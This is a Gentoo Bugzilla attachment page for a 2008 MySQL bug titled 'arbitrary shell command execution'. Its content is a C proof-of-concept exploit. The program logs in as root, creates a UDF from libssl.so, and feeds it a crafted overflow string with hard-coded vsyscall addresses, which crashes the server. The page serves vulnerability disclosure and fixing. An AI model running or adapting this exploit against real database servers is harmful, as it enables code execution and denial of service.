Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 152523 Details for
Bug 220813
dev-db/mysql: arbitrary shell command execution
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
mysql_udf.c
mysql_udf.c (text/plain), 1.80 KB, created by
Robert Buchholz (RETIRED)
on 2008-05-08 22:25:49 UTC
(
hide
)
Description:
mysql_udf.c
Filename:
MIME Type:
Creator:
Robert Buchholz (RETIRED)
Created:
2008-05-08 22:25:49 UTC
Size:
1.80 KB
patch
obsolete
>/* > * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \ > * -o mysql_udf mysql_udf.c > * > * Dou to the use of linux-gate, this example will only work on linux. > * > */ > >#include <stdio.h> >#include <stdlib.h> >#include <mysql.h> > >#define MY_HOST "127.0.0.1" >#define MY_USER "root" >#define MY_PASS "" > >int main(void) >{ > MYSQL mysql; > char sql[1024]; > int len; > > if(!mysql_init(&mysql)) { > return -1; > } > > mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8"); > > if(!mysql_real_connect( > &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0) > ) { > fprintf(stderr, "Connecting: %s\n", mysql_error(&mysql)); > exit(EXIT_FAILURE); > } > > len = snprintf(sql, sizeof(sql), > "create function ssl2_enc returns integer soname 'libssl.so'" > ); > > if(!mysql_real_query(&mysql, sql, len)) { > fprintf(stderr, "Creating: %s\n", mysql_error(&mysql)); > exit(EXIT_FAILURE); > } > > len = snprintf(sql, sizeof(sql), > "select ssl2_enc(\"" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > "\")", > 0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK. > 0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18 > // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall > 0x09, 0xe1, 0xff, 0xff // addr - 0xac > ); > mysql_real_query(&mysql, sql, len); > fprintf(stderr, "Result: %s\n", mysql_error(&mysql)); > > len = snprintf(sql, sizeof(sql), "drop function ssl2_enc"); > if(!mysql_real_query(&mysql, sql, len)) { > fprintf(stderr, "Dropping: You just killed the server!\n"); > exit(EXIT_FAILURE); > } > > printf("Exiting...\n"); > > exit(EXIT_SUCCESS); >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 220813
:
152431
| 152523